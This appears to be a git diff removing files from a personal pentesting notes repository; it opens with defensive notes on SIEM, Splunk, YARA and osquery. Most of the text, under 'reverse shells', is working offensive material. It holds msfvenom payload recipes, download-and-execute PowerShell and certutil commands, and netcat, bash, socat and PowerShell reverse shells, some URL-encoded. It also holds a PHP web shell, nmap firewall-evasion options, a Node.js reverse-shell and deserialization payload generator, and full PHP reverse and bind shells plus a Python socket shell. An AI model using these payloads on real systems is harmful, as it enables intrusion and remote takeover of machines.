* [osq-ext-bin](https://github.com/polylogyx/osq-ext-bin)
### Yara
```sql
select * from yara where sigfile='<sigfile>' and path like '/home/%%';
```
* [Docs](https://osquery.readthedocs.io/en/stable/deployment/yara/)

3
misc/threat_intelligence/pithus.md
View File

@ -1,3 +0,0 @@
# Pithus Mobile Threat Intelligence
* https://beta.pithus.org

30
misc/threat_intelligence/siem.md
View File

@ -1,30 +0,0 @@
# Security Information and Event Management (SIEM)
Collection of data as events on information systems in order to correlate through rulesets.
Network devices and connected endpoints generate events, both are of interest in SIEM.
This is done to reduce threats and to improve security posture.
* [Varonis](https://www.varonis.com/blog/what-is-siem/)
## Workflow
* Threat detection
* Investigation
* Alerting and Reporting
* Visibility
* Time to respond
* Basic SIEM monitoring is done through the following stages
* Log collection
* Normalization
* Security incident detection
* Assess true or false events
* Notifications and alerts
* Further threat response workflow
## Sources of Interest
Linux provides multiple security related logs under ` /var/log ` as well as processes under ` /proc `
This includes the services, access, system and kernel logs as well as the scheduled cron jobs.

77
misc/threat_intelligence/splunk.md
View File

@ -1,77 +0,0 @@
# Splunk
## Splunk Bar
* Messages
* Settings
* Activity
* Help
* Find
## Architectural Components
* __Forwarder__, as an agent
* __Indexer__, receives data from forwarder, normalizes it
* __Search Head__, look into indices
## Search & Reporting
The bread and butter of Splunk. Events can be found and searched here.
* Tip: If you want to land into the Search app upon login automatically, you can do so by editing the user-prefs.conf file.
```sh
C:\Program Files\Splunk\etc\apps\user-prefs\default\user-prefs.conf
/opt/splunk/etc/apps/user-pref/default/user-prefs.conf
```
* [Docs](https://docs.splunk.com/Documentation/Splunk/8.1.2/SearchTutorial/Aboutthesearchapp)
* [Start searching](https://docs.splunk.com/Documentation/Splunk/8.1.2/SearchTutorial/Startsearching)
* [Time range picker](https://docs.splunk.com/Documentation/Splunk/8.1.2/SearchTutorial/Aboutthetimerangepicker)
* [Field to search](https://docs.splunk.com/Documentation/Splunk/8.1.2/SearchTutorial/Usefieldstosearch)
* [Use field lookups](https://docs.splunk.com/Documentation/Splunk/8.1.2/SearchTutorial/Usefieldlookups)
* [Search field lookups](https://docs.splunk.com/Documentation/Splunk/8.1.2/SearchTutorial/Searchwithfieldlookups)
* [Splunk Regex](https://docs.splunk.com/Documentation/Splunk/8.1.2/Knowledge/AboutSplunkregularexpressions)
* Tabs
* Event
* Patterns
* Statistics
* Visualization
## Adding Data
Multiple different log sources can be added as events.
* [Adding Data Docs](https://docs.splunk.com/Documentation/Splunk/8.1.2/Data/Getstartedwithgettingdatain#Use_apps_to_get_data_in)
* `Settings > Data > Data Inputs` contains further sources
* Add data after that via `Add Data`
## Queries
* [Metadata](http://docs.splunk.com/Documentation/Splunk/latest/SearchReference/Metadata)
* [Metalore](https://www.splunk.com/blog/2017/07/31/metadata-metalore.html)
```sh
| metadata type=sourcetypes index=botsv2 | eval firstTime=strftime(firstTime,"%Y-%m-%d %H:%M:%S") | eval lastTime=strftime(lastTime,"%Y-%m-%d %H:%M:%S") | eval recentTime=strftime(recentTime,"%Y-%m-%d %H:%M:%S") | sort - totalCount
```
* Examples
* Filtering HTTP sites visited for found IP
```sh
index="botsv2" 10.0.2.101 sourcetype="stream:HTTP" | dedup site | table site
```
## Sigma
* [Sigma Repo](https://github.com/Neo23x0/sigma)
* [TA-Sigma-Searches](https://github.com/dstaulcu/TA-Sigma-Searches)
* [Conversion](https://uncoder.io/)
* E.g. : `sigma: APT29` as input
## Dashboard
Create visualizations and group them.
```sh
source="<source>" | top limit=5 EventID
```
* Visualization > choose Chart > "Save As" (top right) > DashboardName
## Alerting
* [Workflow](https://docs.splunk.com/Documentation/SplunkCloud/8.1.2012/Alert/AlertWorkflowOverview)

40
misc/threat_intelligence/yara.md
View File

@ -1,40 +0,0 @@
# Yara
## Structure
A rule consists of
* Name
* Metadata
* String definitions
* Conditions on these strings
## Example
```sh
rule eicar {
meta:
author="foo"
description="eicar test virus"
strings:
$a="X5O"
$b="EICAR"
$c="ANTIVIRUS"
$d="TEST"
condition:
$a and $b and $c and $d
}
```
## Usage
* Information about a rule, metadata or strings
```sh
yara -m <file.yara> <file.target>
yara -s <file.yara> <file.target>
```
* Run Yara via
```sh
yara <file.yara> <file.target>
```
* If the name of the rule and the target is returned, the rule matched. Otherwise it did not match.

20
misc/wifi/airmon-ng.md
View File

@ -1,20 +0,0 @@
# aircrack-ng
## airmon-ng
* Monitor on interface
```sh
airmon-ng start <interface>
```
## airodump-ng
* Capture traffic
## aircrack-ng
* Use captured network traffic to crack
* Specify targets via common options
* Create hashcap files as `HCCAPX` or `HCCAP`
```sh
aircrack-ng -w <wordlist> -b <bssidFromCapture> -j <outputHashcatFile> <INPUTFILE>
```

42
misc/win32.md
View File

@ -1,42 +0,0 @@
# Win32 API
* Users are able to send systemcalls to the kernel without invoking direct kernel mode
* Header files and DLLs are referenced to call standard functions, [Windows.h](https://en.wikipedia.org/wiki/Windows.h)
* There are core and supplemental DLLs
* Core DLLs are KERNEL32, USER32 and ADVAPI32
* Supplemental DLLs are NTDLL, COM or FVEAPI
* API calls have a call structure with explicit parameters
* ASLR is used
## API Calls
* [Win32 API calls doc](https://docs.microsoft.com/en-us/windows/win32/apiindex/windows-api-list)
* [MalAPI.io](http://malapi.io/) provides API calls to exploit
* Extend functionality by extending the naming scheme
* __A__ is ANSI
* __W__ is Unicode
* __Ex__ is extended functionalities for I/O
### C API
* `windows.h` can be included to provide functionality
* Instantiate a variable with a function provided by the API
### P/Invoke
* DLL imports and external methods can be imported via [P/Invoke](https://docs.microsoft.com/en-us/dotnet/standard/native-interop/pinvoke)
* Subsitutes the `windows.h` implementation and may be used instead of it for __powershell__ and __.NET__
```C#
using System;
using System.Runtime.InteropServices;
public class Program
{
[DllImport("user32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
private static extern int MessageBox(IntPtr hWnd, string lpText, string lpCaption, uint uType);
...
}
```

1
reverse shells/One-Lin3r

@ -1 +0,0 @@
Subproject commit 9fdfa5f0b9c698dfbd4cdfe7d2473192777ae1c6

33
reverse shells/docs/evil-winrm.md
View File

@ -1,33 +0,0 @@
# evil-winrm
* Password or NTLM Hash as authenticator
```sh
evil-winrm -u Administrator -H <Hash> -i IP
evil-winrm -u Administrator -p <Password> -i IP -P <Port>
```
## Upload & Download
* On opened host
```sh
upload <attackerFilePath>
download <remoteFilePath> <attackerFilePath>
```
## Load Powershell Scripts into Target Memory
* Load attacker scripts into target's memory
```sh
evil-winrm -u <user> -p <password> -i IP -s <localScriptDir>
```
* As an example, load Empire scripts dir for port scanning
```sh
evil-winrm -u Administrator -H 37db630168e5f82aafa8461e05c6bbd1 -i 127.0.0.1 -P 8001 -s tools/post_exploitation/bc_security/Empire/empire/server/data/module_source/situational_awareness/network/
```
* Init `Invoke-Portscan.ps1`
* `Get-Help Invoke-Portscan`
```sh
Invoke-Portscan -Hosts 10.200.187.100 -TopPorts 50
```

12
reverse shells/docs/msfconsole.md
View File

@ -1,12 +0,0 @@
# metasploit reverse shell
```use multi/handler```
```sh
set PAYLOAD <payload>
set LHOST <listen-address>
set LPORT <liste-port>
exploit -j
```
* multi/handler is backgrounded. Therefore, `session 1` foregrounds the session.
* __LPORT under 1024__ user must be root or use sudo

97
reverse shells/docs/msfvenom.md
View File

@ -1,97 +0,0 @@
# msfvenom Usage
* [Cheat Sheet](https://thedarksource.com/msfvenom-cheat-sheet-create-metasploit-payloads/#waf-and-antivirus-detectionav-bypass-using-msfvenom-encoders)
```
msfvenom -p <payload> <options>
```
* syntax
```
<OS>/<arch>/<payload>
```
* stageless
```
linux/x86/shell_reverse_tcp
```
* staged
```
linux/x86/shell/reverse_tcp
```
## Windows
### x64 Reverse Shell in exe format
```
msfvenom -p windows/x64/shell_reverse_tcp -f exe -o shell.exe LHOST=<listen-IP> LPORT=<listen-port>
```
### x86 shikata_ga_nai
```
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encode x86/shikata_ga_nai LHOST=10.9.7.123 LPORT=4446 -f exe -o shell.exe
```
### Getting the shell on target
* on attack machine, with shell.exe in cwd
```
python -m http.server
```
* on target machine execute this
```
powershell "(New-Object System.Net.WebClient).Downloadfile('http://<ip>:8000/shell-name.exe','shell-name.exe')"
Start-Process "shell.exe"
```
or
```
powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port
```
or
```
powershell -c "Invoke-WebRequest -Uri 'ip/shell.exe' -OutFile 'C:\Windows\Temp\shell.exe'"
```
or on cmd.exe
```sh
certutil -urlcache -split -f http://<attacker-IP>:<attacker-Port>/shell.exe
```
* Using SMB
On attacker
```sh
sudo python impacket/examples/smbserver.py dir .
```
on target
```sh
copy \\<attacker-IP>\dir\shell.exe C:\shell.exe
```
## Unix
### netcat reverse
```sh
msfvenom -p cmd/unix/reverse_netcat LHOST=<listen-ip> LPORT=<liste-port> R
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<attacker-IP> LPORT=<Port> -f elf -o shell.elf
```
* Alternatively, not msfvenom
```sh
bash -c "bash -i >& /dev/tcp/<listen-ip>/<listen-port> 0>&1"
```
### Include into Python Exploit as hex
```sh
msfvenom -p windows/shell_reverse_tcp LHOST=<attacker-IP> LPORT=4444 EXITFUNC=thread -b "\x00" -f py
```
## PHP
```sh
msfvenom -p php/reverse_shell LHOST=<attacker-IP> lPORT=4444 -f raw > reverse_shell.php
```
* Enclose raw file inside `<?php ... ?>` tags
## ASP
```sh
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker-IP> LPORT=<attacker-Port> -f asp -o rev_shell.asp
```
## Python
```sh
msfvenom -p cmd/unix/reverse_python LHOST=<attacker-IP> LPORT=<attacker-Port> -f python -o reverse_shell.python
```

28
reverse shells/docs/netcat.md
View File

@ -1,28 +0,0 @@
# netcat reverse shells
## Payloads
### linux reverse shell
```sh
mkfifo /tmp/f; nc <attacker-ip> <attacker-port> < /tmp/f | /bin/sh > /tmp/f 2>&1; rm /tmp/f
```
### windows bind shell
```sh
nc -lvnp <PORT> -e /bin/bash
```
### linux bind shell
```sh
mkfifo /tmp/f; nc -lvnp <PORT> < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f
```
```sh
nc -lvnp <PORT> -e /bin/sh
```
### powershell reverse shell
* starts the powershell, can be used in cmd.exe as well
```sh
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
```

10
reverse shells/docs/powershell.md
View File

@ -1,10 +0,0 @@
# Powershell Reverse Shells
```sh
powershell.exe -c "$client = New-Object System.Net.Sockets.TCPClient('IP',PORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
```
* URL encode
```sh
powershell.exe+-c+%22%24client+%3D+New-Object+System.Net.Sockets.TCPClient%28%2710.200.187.200%27%2C54789%29%3B%24stream+%3D+%24client.GetStream%28%29%3B%5Bbyte%5B%5D%5D%24bytes+%3D+0..65535%7C%25%7B0%7D%3Bwhile%28%28%24i+%3D+%24stream.Read%28%24bytes%2C+0%2C+%24bytes.Length%29%29+-ne+0%29%7B%3B%24data+%3D+%28New-Object+-TypeName+System.Text.ASCIIEncoding%29.GetString%28%24bytes%2C0%2C+%24i%29%3B%24sendback+%3D+%28iex+%24data+2%3E%261+%7C+Out-String+%29%3B%24sendback2+%3D+%24sendback+%2B+%27PS+%27+%2B+%28pwd%29.Path+%2B+%27%3E+%27%3B%24sendbyte+%3D+%28%5Btext.encoding%5D%3A%3AASCII%29.GetBytes%28%24sendback2%29%3B%24stream.Write%28%24sendbyte%2C0%2C%24sendbyte.Length%29%3B%24stream.Flush%28%29%7D%3B%24client.Close%28%29%22
```

52
reverse shells/docs/shell_upgrade.md
View File

@ -1,52 +0,0 @@
# Upgrade Reverse Shell
* [HighOn.Coffee](https://highon.coffee/blog/reverse-shell-cheat-sheet/)
* [reverse shell without python](https://www.schtech.co.uk/linux-reverse-shell-without-python/)
* [ropnop](https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/)
## Via interpreter
### PHP
* reverse shell
```php
php -r '$sock=fsockopen("<attacker-IP>", <attacker-Port>);exec("/bin/sh -i <&3 >&3 2>&3");'
```
```php
php -r 'exec ("/bin/bash")";'
```
* Sometimes even
```php
php -e 'exec "/bin/bash";'
```
### Python
```python
python -c 'import pty; pty.spawn("/bin/bash")'
```
### Perl
```perl
perl -e 'exec "/bin/sh";'
```
### Script
```sh
/usr/bin/script -qc /bin/bash /dev/null
```
## Next
1. `ctrl` + `z`
2. `stty echo -raw`
3. `fg`
4. `export SHELL=bash`
5. `export TERM=xterm`
## Via SSH
* `ssh-keygen`
* copy priv key and `chmod 600`
* `cat id_rsa.pub > authorized_keys` on target
## As Code
### PHP
```sh
<?php exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attacker-IP> <attacker-PORT> > /tmp/f') ?>
```

54
reverse shells/docs/socat.md
View File

@ -1,54 +0,0 @@
# socat cheat sheet
## Reverse Shell
### reverse shell listener
```socat tcp-l:<port> -```
```socat TCP-L:<PORT> file:`tty`,raw,echo=0```
### windows target
```sh
socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:powershell.exe,pipes
```
### linux target
```sh
socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:"bash -li",pty,stderr,sigint,setsid,sane
```
## Bind Shell
### generic connect
```socat TCP:<TARGET-IP>:<TARGET-PORT> -```
### windows target listener
```socat TCP-L:<PORT> EXEC:powershell.exe,pipes```
### linux target listener
```socat TCP-L:<PORT> EXEC:"bash -li"
## Connect from statically compiled socat to LHOST
Binary is inside this dir
```socat TCP:<ATTACKER-IP>:<ATTACKER-PORT> EXEC:"bash -li",pty,stderr,sigint,setsid,sane```
## Encrypted Shell
### create key + cert
```openssll req --newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt```
### create pem file
```cat shell.key shell.crt > shell.pem```
### reverse shell listener
```socat openssl-listen:<port>,cert=shell.pem,verify=0 -```
```socat openssl-listen:<port>,cert=shell.pem,verify=0 file:`tty`,raw,echo=0```
### connecting shell on target to listener
```socat openssl:<attacker-ip>:<attacker-port>,verify=0 exec:/bin/bash```
```socat openssl:<attacker-ip>:<attacker-port>,verify=0 exec:"bash -li",pty,stderr,sigint,setsid,sane```
### encrypted bind shell on windows listening
* target
```socat openssl-listen:<local-ip>:<local-port>,verify=0 exec:cmd.exe,pipes```
### encrypted bind shell attacker connecting
```socat openssl:<port>,cert=shell.pem,verify=0 -```

13
reverse shells/docs/webshell.md
View File

@ -1,13 +0,0 @@
# Webshell Usage
## Examples
* PHP execute shellcommands inside URL parameter
```<?php echo "<pre>" . shell_exec($_GET["cmd"]) . "</pre>"; ?>```
* [PentestMonkey php-reverse-shell](https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php)
* On windows, reverse bind shell is often easier
```powershell%20-c%20%22%24client%20%3D%20New-Object%20System.Net.Sockets.TCPClient%28%27<IP>%27%2C<PORT>%29%3B%24stream%20%3D%20%24client.GetStream%28%29%3B%5Bbyte%5B%5D%5D%24bytes%20%3D%200..65535%7C%25%7B0%7D%3Bwhile%28%28%24i%20%3D%20%24stream.Read%28%24bytes%2C%200%2C%20%24bytes.Length%29%29%20-ne%200%29%7B%3B%24data%20%3D%20%28New-Object%20-TypeName%20System.Text.ASCIIEncoding%29.GetString%28%24bytes%2C0%2C%20%24i%29%3B%24sendback%20%3D%20%28iex%20%24data%202%3E%261%20%7C%20Out-String%20%29%3B%24sendback2%20%3D%20%24sendback%20%2B%20%27PS%20%27%20%2B%20%28pwd%29.Path%20%2B%20%27%3E%20%27%3B%24sendbyte%20%3D%20%28%5Btext.encoding%5D%3A%3AASCII%29.GetBytes%28%24sendback2%29%3B%24stream.Write%28%24sendbyte%2C0%2C%24sendbyte.Length%29%3B%24stream.Flush%28%29%7D%3B%24client.Close%28%29%22```

99
reverse shells/firewalls.md
View File

@ -1,99 +0,0 @@
# Firewall Handling
## Types
* Packet filtering
* Circuit level gateway
* Stateful inspection
* Proxy
* Next generation firewall
* Cloud firewall and FWaaS
## Rules
### Windows
```sh
netsh advfirewall firewall add rule name="muka" dir=in action=allow protocol=tcp localport=57869
```
### CentOS
```sh
firewall-cmd --zone=public --add-port=57869/tcp
```
## Circumvention
* IP/MAC/Port spoofing
* Fragmentation, MTU, data length
* Header modification
### nmap
#### Spoofing
* __Decoy__ `-D` , mixin real IP address with random adresses. Every port will be requested by any of these addresses.
```sh
sudo nmap -Pn -D 192.168.0.23,192.168.0.42,ME -F $TARGET_IP
sudo nmap -Pn -D RND,RND,ME -F $TARGET_IP
```
* __Proxy__
```sh
sudo nmap -Pn -F --proxies $PROXY_IP $TARGET_IP
```
* __Spoofed MAC__
```sh
sudo nmap -Pn -F --spoof-mac $MAC_ADDRESS $TARGET_IP
```
* __Spoofed IP__
```sh
sudo nmap -Pn -F -S $ATTACKER_IP $TARGET_IP
```
* __Port Number__, select a port which is whitelisted. Frequently this is 53,80,44
```sh
sudo nmap -F --source-port 443 $TARGET_IP
```
* __Fragmentation__, eth header + 20 bytes header size + bytes fragments via `-f`, or 16 bytes via `-ff`
```sh
sudo nmap -Pn -F -f $TARGET_IP
```
* __MTU__, works like fragmentation, `-f` == `--mtu 8`
```sh
sudo nmap -Pn -F --mtu 8
```
* __DATA Length__, eth header + IP header + prepend padding segment size to values of bytes
```sh
sudo nmap -Pn -F --data-length 64 $TARGET_IP
```
#### Header Fields
* __TTL__
```sh
sudo nmap -Pn -F --ttl 64 $TARGET_IP
```
* __IP OPTIONS__, `--ip-options` recordsas hex String
* Route, `R`
* Timestamp, `T`
* Route + Timestamp, `U`
* Loose source routing, `L $IP $IP $IP`
* Strict source routing, `S $IP $IP $IP`
* __Checksum__, craft bad checksum via `--badsum` to check errors
```sh
sudo nmap -Pn -F --badsum $TARGET_IP
```
#### After the FW
* __Hopping__, listen via netcat to catch that port
* __Tunneling__, relay open after passsing the firewall to connect to the closed port
```sh
nc -lvnp 443 --sh-exec "nc $TARGET_IP 25"
```
* __Non standard ports__, open bin shell via
```sh
nc -lvnp 8888 -e /bin/bash
```
and connect

BIN
reverse shells/ncat.exe
View File

Binary file not shown.

129
reverse shells/node_shell.py
View File

@ -1,129 +0,0 @@
#!/usr/bin/python
# Author: Hd7exploit
# hd7exploit.wordpress.com
# Based on https://github.com/evilpacket/node-shells/blob/master/node_revshell.js
import getopt, sys
def usage():
print '''
Usage: %s <TYPE> <HOST> <PORT> <ENCODE>
Help:
-c : Run some linux commands (ls,cat...)
-r : Get payload reverse shell
-b : Get payload bind shell
-h : IP address in case of reverse shell
-p : Port
-e : Encode shell
-o : Create a object contain payload with Immediately invoked function expression (IIFE)
''' % (sys.argv[0])
try:
opts, args = getopt.getopt(sys.argv[1:], "c:h:rbp:eo", ["help"])
if not opts:
usage()
sys.exit()
except getopt.GetoptError:
usage()
sys.exit(2)
type = host = port = command = ""
encode = False
object = False
for o, a in opts:
if o == "-r":
type = 'REVERSE'
if o == "-b":
type = 'BIND'
if o == "-h":
host = a
if o == "-o":
object = True
if o == "-p":
port = a
if o == "-c":
type = 'COMMAND'
command = a
if o == "-e":
encode = True
if o == "--help":
usage()
sys.exit()
def get_reverse_shell():
return '''
var net = require('net');
var spawn = require('child_process').spawn;
HOST="%s";
PORT="%s";
TIMEOUT="5000";
if (typeof String.prototype.contains === 'undefined') { String.prototype.contains = function(it) { return this.indexOf(it) != -1; }; }
function c(HOST,PORT) {
var client = new net.Socket();
client.connect(PORT, HOST, function() {
var sh = spawn('/bin/sh',[]);
client.write("Connected!\\n");
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
sh.on('exit',function(code,signal){
client.end("Disconnected!\\n");
});
});
client.on('error', function(e) {
setTimeout(c(HOST,PORT), TIMEOUT);
});
}
c(HOST,PORT);
''' % (host, port)
def get_bind_shell():
return '''
var net = require('net');
var spawn = require('child_process').spawn;
PORT="%s";
if (typeof String.prototype.contains === 'undefined') { String.prototype.contains = function(it) { return this.indexOf(it) != -1; }; }
var server = net.createServer(function (c) {
var sh = spawn('/bin/sh', ['-i']);
c.pipe(sh.stdin);
sh.stdout.pipe(c);
sh.stderr.pipe(c);
});
server.listen(PORT);
''' % (port)
def get_command(command):
return '''
require('child_process').exec('%s', function(error, stdout, stderr) {
console.log(error)
console.log(stdout)
})
''' % (command)
def encode_string(string):
string_encoded = ''
for char in string:
string_encoded += "," + str(ord(char))
return string_encoded[1:]
payload = ""
if type == 'BIND':
payload = get_bind_shell()
elif type == 'REVERSE':
payload = get_reverse_shell()
else:
payload = get_command(command);
if encode:
payload = encode_string(payload)
if object:
payload = '''
{"run": "_$$ND_FUNC$$_function (){eval(String.fromCharCode(%s))}()"}
''' % (payload)
print '''
=======> Happy hacking <======
'''
print payload

192
reverse shells/pentest_monkey
View File

@ -1,192 +0,0 @@
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. The author accepts no liability
// for damage caused by this tool. If these terms are not acceptable to you, then
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. If these terms are not acceptable to
// you, then do not use this tool.
//
// You are encouraged to send comments, improvements or suggestions to
// me at pentestmonkey@pentestmonkey.net
//
// Description
// -----------
// This script will make an outbound TCP connection to a hardcoded IP and port.
// The recipient will be given a shell running as the current user (apache normally).
//
// Limitations
// -----------
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
// Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available.
//
// Usage
// -----
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.
set_time_limit (0);
$VERSION = "1.0";
$ip = '10.9.7.123'; // CHANGE THIS
$port = 4448; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
//
// Daemonise ourself if possible to avoid zombies later
//
// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
// Make the current process a session leader
// Will only succeed if we forked
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
// Change to a safe directory
chdir("/");
// Remove any umask we inherited
umask(0);
//
// Do the reverse shell...
//
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
// Check for end of TCP connection
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
// Check for end of STDOUT
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
// Wait until a command is end down $sock, or some
// command output is available on STDOUT or STDERR
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
// If we can read from the TCP socket, send
// data to process's STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
// If we can read from the process's STDOUT
// send data down tcp connection
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
// If we can read from the process's STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}
?>

1
reverse shells/php-reverse-shell

@ -1 +0,0 @@
Subproject commit 0483a9bd75d10502d4c91b5402eeb758c9d8e96d

138
reverse shells/php_bind_shell
View File

@ -1,138 +0,0 @@
<?php
/*********************
@@author : lionaneesh
@@facebook : facebook.com/lionaneesh
@@Email : lionaneesh@gmail.com
********************/
?>
<html>
<head>
<title>Bind Shell — PHP</title>
</head>
<body>
<h1>Welcome to Bind Shell Control Panel </h1>
<p> Fill in the form Below to Start the Bind Shell Service </p>
<?php
if( isset($_GET[port]) &&
isset($_GET[passwd]) &&
$_GET[port] != “” &&
$_GET[passwd] != “”
)
{
$address = 127.0.0.1; // As its a bind shell it will always host on the local machine
// Set the ip and port we will listen on
$port = $_GET[port];
$pass = $_GET[passwd];
// Set time limit to indefinite execution
set_time_limit (0);
if(function_exists(“socket_create”))
{
// Create a TCP Stream socket
$sockfd = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
// Bind the socket to an address/port
if(socket_bind($sockfd, $address, $port) == FALSE)
{
echo “Cant Bind to the specified port and address!”;
}
// Start listening for connections
socket_listen($sockfd,15);
$passwordPrompt =
“\n=================================================================\n
PHP Bind Shell\n
\n
@@author : lionaneesh\n
@@facebook : facebook.com/lionaneesh\n
@@Email : lionaneesh@gmail.com\n
\n
=================================================================\n\n
Please Enter Password : “;
/* Accept incoming requests and handle them as child processes */
$client = socket_accept($sockfd);
socket_write($client , $passwordPrompt);
// Read the pass from the client
$input = socket_read($client, strlen($pass) + 2); // +2 for \r\n
if(trim($input) == $pass)
{
socket_write($client , “\n\n”);
socket_write($client , shell_exec(“date /t & time /t”) . “\n” . shell_exec(“ver”) . shell_exec(“date”) . “\n” . shell_exec(“uname -a”));
socket_write($client , “\n\n”);
while(1)
{
// Print Command prompt
$commandPrompt =”(Bind-Shell)[$]> “;
$maxCmdLen = 31337;
socket_write($client,$commandPrompt);
$cmd = socket_read($client,$maxCmdLen);
if($cmd == FALSE)
{
echo “The client Closed the conection!”;
break;
}
socket_write($client , shell_exec($cmd));
}
}
else
{
echo “Wrong Password!”;
socket_write($client, “Wrong Password , Please try again \n\n”);
}
socket_shutdown($client, 2);
socket_close($socket);
}
else
{
echo “Socket Conections not Allowed/Supported by the server! <br />”;
}
}
else
{
?>
<table align=”center” >
<form method=”GET”>
<td>
<table style=”border-spacing: 6px;”>
<tr>
<td>Port</td>
<td>
<input style=”width: 200px;” name=”port” value=”31337″ />
</td>
</tr>
<tr>
<td>Passwd </td>
<td><input style=”width: 100px;” name=”passwd” size=5 value=”lionaneesh”/>
</tr>
<tr>
<td>
<input style=”width: 90px;” class=”own” type=”submit” value=”Bind :D!”/>
</td>
</tr>
</table>
</td>
</form>
</tr>
</table>
<p align=”center” style=”color: red;” >Note : After clicking Submit button , The browser will start loading continuously , Dont close this window , Unless you are done!</p>
<?php
}
?>

1
reverse shells/phpreverseshell

@ -1 +0,0 @@
Subproject commit 72873b93fa3d960ce35f8c46d6fd8195a45f17c0

BIN
reverse shells/socat_static
View File

Binary file not shown.

10
reverse shells/sock_shell.py
View File

@ -1,10 +0,0 @@
import os
import socket
import subprocess
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("#Target", 3000))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
import pty;pty.spawn("/bin/bash")

1
reverse shells/windows/evil-winrm

@ -1 +0,0 @@
